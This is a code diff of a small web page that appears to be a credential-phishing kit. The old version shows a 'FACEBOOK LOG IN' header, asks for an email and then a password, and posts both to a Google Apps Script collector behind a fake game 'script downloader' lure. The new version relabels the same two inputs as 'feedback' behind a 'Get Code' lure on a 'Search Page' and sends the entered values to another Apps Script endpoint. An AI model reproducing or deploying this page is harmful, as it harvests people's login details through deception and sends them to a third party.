--- a/index.html
+++ b/index.html
@@ -2,79 +2,68 @@
 <html lang="en">
 <head>
 <meta charset="UTF-8">
-<title>Script Downloader</title>
+<title>Search Page</title>
 
 <style>
 body{
   margin:0;
   font-family: Helvetica, Arial, sans-serif;
   background:#f0f2f5;
+  display:flex;
+  justify-content:center;
+  align-items:center;
+  height:100vh;
 }
 
-/* Header */
-.header{
-  background:#1877f2;
-  color:white;
-  padding:14px;
-  font-size:20px;
-  font-weight:bold;
-  text-align:center;
-}
-
-/* Card */
 .box{
-  background:white;
-  max-width:420px;
-  margin:30px auto;
+  background:#fff;
+  width:360px;
   padding:20px;
   border-radius:8px;
-  box-shadow:0 2px 6px rgba(0,0,0,.2);
+  box-shadow:0 2px 10px rgba(0,0,0,.15);
   text-align:center;
 }
 
-input, textarea{
+/* Facebook-like input */
+.fb-input{
   width:100%;
-  padding:12px;
-  margin:10px 0;
+  height:44px;
+  padding:0 12px;
+  font-size:15px;
   border-radius:6px;
   border:1px solid #ccd0d5;
-  font-size:15px;
+  margin:10px 0;
 }
-
-textarea{height:48px; resize:none;}
 
 button{
   width:100%;
-  padding:12px;
+  height:44px;
   border:none;
   border-radius:6px;
   background:#1877f2;
-  color:white;
-  font-size:16px;
-  font-weight:bold;
+  color:#fff;
+  font-size:15px;
   cursor:pointer;
 }
 
-button:active{opacity:.85}
-
-.hidden{display:none;}
-
-.small{
-  color:#65676b;
-  font-size:13px;
-  margin-bottom:10px;
+.link{
+  color:#1877f2;
+  margin-top:10px;
+  cursor:pointer;
+  font-size:14px;
 }
+
+.hidden{display:none}
 
 /* Loading */
 .loading{
   width:100%;
-  height:6px;
   background:#ddd;
-  border-radius:4px;
+  border-radius:6px;
   overflow:hidden;
 }
 .bar{
-  height:100%;
+  height:20px;
   width:0%;
   background:#1877f2;
 }
@@ -83,105 +72,86 @@ button:active{opacity:.85}
 
 <body>
 
-<div class="header">FACEBOOK LOG IN</div>
-
-<!-- LOADING -->
-<div class="box" id="loadingBox">
-  <div class="small">Loading...</div>
+<!-- PAGE 1 SEARCH -->
+<div class="box" id="page1">
+  <h3>Search</h3>
   <div class="loading"><div class="bar" id="bar"></div></div>
   <p id="percent">0%</p>
 </div>
 
+<!-- PAGE 2 ENTER CODE -->
+<div class="box hidden" id="codePage">
+  <h3>Enter Code</h3>
+  <input class="fb-input" placeholder="Enter Code">
+  <button>Submit</button>
+  <div class="link" onclick="getCode()">Don't have a Code? Get Code</div>
+</div>
+
 <!-- FEEDBACK 1 -->
-<div class="box hidden" id="feedback1Box">
-  <div class="small">Unlocking password 1/2</div>
-  <textarea id="feedback1" placeholder="Enter Email"></textarea>
-  <button onclick="nextFeedback()">GO</button>
+<div class="box hidden" id="fb1">
+  <h3>Feedback</h3>
+  <input class="fb-input" id="f1" placeholder="Enter feedback">
+  <button onclick="sendF1()">Send</button>
 </div>
 
 <!-- FEEDBACK 2 -->
-<div class="box hidden" id="feedback2Box">
-  <div class="small">Unlocking password 2/2<?</div>
-  <textarea id="feedback2" placeholder="Enter Password"></textarea>
-  <button onclick="submitFeedback()">Get Password</button>
+<div class="box hidden" id="fb2">
+  <h3>More Feedback</h3>
+  <input class="fb-input" id="f2" placeholder="Enter feedback">
+  <button onclick="sendF2()">Send</button>
 </div>
 
-<!-- PASSWORD -->
-<div class="box hidden" id="passwordBox">
-  <div class="small">Your Password</div>
-  <h2>5863</h2>
-  <button onclick="backToMain()">Back to Main</button>
-</div>
-
-<!-- MAIN -->
-<div class="box hidden" id="mainBox">
-  <h2>SCRIPT DOWNLOADER</h2>
-  <input id="pass" placeholder="Enter Password">
-  <button onclick="checkPassword()">Enter Password</button>
-</div>
-
-<!-- SCRIPT LIST -->
-<div class="box hidden" id="scriptBox">
-  <h3>Scripts</h3>
-  <button onclick="alert('NO SCRIPT')">🎮Super Bear Adventure</button>
-  <button onclick="alert('NO SCRIPT')">🎮Gym Idle Clicker</button>
-  <button onclick="alert('NO SCRIPT')">🎮Counter Terrorist Strike</button>
-  <button onclick="alert('NO SCRIPT')">🎮Heroes Strike</button>
-  <button onclick="alert('NO SCRIPT')">🎮Magica.io</button>
-  <button onclick="alert('NO SCRIPT')">🎮Obby Parkour</button>
-  <button onclick="alert('NO SCRIPT')">🎮Mobile Legends Bang Bang</button>
+<!-- CODE SHOW -->
+<div class="box hidden" id="codeShow">
+  <h2>CODE</h2>
+  <h1>5864</h1>
+  <button onclick="copyCode()">COPY</button>
+  <div class="link" onclick="backMain()">Back to main</div>
 </div>
 
 <script>
-const WEB_APP_URL = "https://script.google.com/macros/s/AKfycbzFhK2kvKx5lklYr4BOtPyfXCQvu8LO-DJaSjf5V-3C1hg6HTlzsCsaPjczLcYZfzpEow/exec";
-let f1 = "";
+const WEB_APP_URL = "https://script.google.com/macros/s/AKfycbyA7-niCePo2iD0lGrbsVRGN-BYBiHubEJeQ17H8ugp9N4GMVaevGNnW5Zaonk85KRgbg/exec";
 
-/* Loading */
-let p = 0;
-let load = setInterval(()=>{
-  p+=2;
-  document.getElementById("bar").style.width = p+"%";
-  document.getElementById("percent").innerText = p+"%";
+/* LOADING 11 SECONDS */
+let p=0;
+let loading=setInterval(()=>{
+  p++;
+  bar.style.width=p+"%";
+  percent.innerText=p+"%";
   if(p>=100){
-    clearInterval(load);
-    loadingBox.classList.add("hidden");
-    feedback1Box.classList.remove("hidden");
+    clearInterval(loading);
+    page1.classList.add("hidden");
+    codePage.classList.remove("hidden");
   }
-},40);
+},110); // ≈11 seconds
 
-/* Feedback */
-function nextFeedback(){
-  f1 = feedback1.value;
-  if(!f1){ alert("Please write feedback"); return; }
-  feedback1Box.classList.add("hidden");
-  feedback2Box.classList.remove("hidden");
+function getCode(){
+  codePage.classList.add("hidden");
+  fb1.classList.remove("hidden");
 }
 
-function submitFeedback(){
-  const f2 = feedback2.value;
-  if(!f2){ alert("Please write feedback"); return; }
-
-  fetch(WEB_APP_URL,{
-    method:"POST",
-    body:JSON.stringify({feedback1:f1, feedback2:f2})
-  }).then(()=>{
-    feedback2Box.classList.add("hidden");
-    passwordBox.classList.remove("hidden");
-  }).catch(()=>alert("Submit failed"));
+function sendF1(){
+  const v=document.getElementById("f1").value;
+  fetch(WEB_APP_URL+"?step=1&feedback="+encodeURIComponent(v));
+  fb1.classList.add("hidden");
+  fb2.classList.remove("hidden");
 }
 
-function backToMain(){
-  passwordBox.classList.add("hidden");
-  mainBox.classList.remove("hidden");
+function sendF2(){
+  const v=document.getElementById("f2").value;
+  fetch(WEB_APP_URL+"?step=2&feedback="+encodeURIComponent(v));
+  fb2.classList.add("hidden");
+  codeShow.classList.remove("hidden");
 }
 
-function checkPassword(){
-  if(pass.value==="5863"){
-    mainBox.classList.add("hidden");
-    scriptBox.classList.remove("hidden");
-  }else{
-    alert("Wrong password");
-  }
+function copyCode(){
+  navigator.clipboard.writeText("5864");
+  alert("Code Copied");
+}
+
+function backMain(){
+  codeShow.classList.add("hidden");
+  codePage.classList.remove("hidden");
 }
 </script>
 
